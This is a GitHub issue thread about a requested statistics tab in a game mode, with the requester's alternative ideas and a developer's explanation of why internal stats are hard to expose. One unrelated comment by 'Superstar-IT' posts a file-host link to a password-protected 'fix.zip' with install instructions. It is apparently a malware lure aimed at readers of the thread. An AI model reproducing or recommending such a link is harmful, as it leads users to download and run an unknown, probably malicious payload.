### ISSUE TITLE
Statistics tab for platinum members

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#79]
**Is your feature request related to a problem? Please describe.**
Some statistics are only provided by achievements & they don't display more than the threshold once it's exceeded.

**Why you would like to see this resolved, what does it enhance / bring to the table?**
A unified tab for all statistics available makes it convenient to access this valuable information without scrolling through achievements & without needing api experience.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sod-ers** [comment]
If adding another tab to the menu impacts performance then perhaps there's a more efficient way to solve this. I'm satisfied with the current state of the menu, it's fast & responsive, & the occasional Linux build crashes seem to have subsided. I understand tabs are loaded dynamically & having another requires more running code, api calls, rendering.. basically there's a cost for everything & I don't want it to affect anyones experience; especially those who benefit from recent enhancements to the menu that increased performance for older hardware. Because achievements already has the "Statistics" label, I thought about what could be implemented into this tab:

- Searchable achievements was mentioned briefly & I like that idea. Probably would have to make adjustments to the summary category or add a search category. 

- Additionally, there could be a favorites category so I can customize my own quick access stat tracker & to keep the achievements I'm actively after pinned.

I suggest these alternatives because these features have already been demonstrated to work & be useful in other menus at BB. I hope it could be less work to port existing code for searching & favorites than maintaining a new tab. I think it may be a better solution so everyone will have access to the enhancements & to avoid creating more api calls than needed.

Am interested to hear your thoughts on this. Was going to suggest a list of stats & a concept for how the ui design could be unless you had something in mind. I believe the api has more parameters (example: amount of times joined) hidden to the user that could be included. My goal when submitting issues is to improve the gamemode for everybody. I'm not trying to have you spend a bunch of time & energy working on features for the minority; so if you decide development time is more valuable spent elsewhere, this can be closed. Not in any rush either, it'd be a bit before I have more input on this, but I'd definitely share my ideas so you won't have to come up with everything by yourself.

Cheers.

**Comment by TeddiO** [comment]
So the reason for delay on this is mostly down to the fact that we have oodles upon oodles of stats, of which some make sense being viewable, and others simply aren't as they're used to internally track things to form part of a bigger picture. For example, sub-criteria on achievements are generally speaking statistics, map completions are statistics - but they're presented to the player as achievements.

We don't really have a nice way of going "display stat to user" and we certainly don't categorize them internally, meaning that while we have that data there is no good or nice way to give you this information, or even what it means. 

Below is a sample of your stats in the database - as you can see the database doesn't really have any understanding what they are, just that they... well are.
![4349f623-e33c-4b0f-9b0a-a73c413d696en-DiligentPeregrinefalcon](https://github.com/user-attachments/assets/0d60526c-1e96-45e2-b9ce-4326513252a1)

Basically it's something I want to do, but there's a whole load of planning and thought as to how the system can be extended (if it even can be in its current form) to achieve this request.
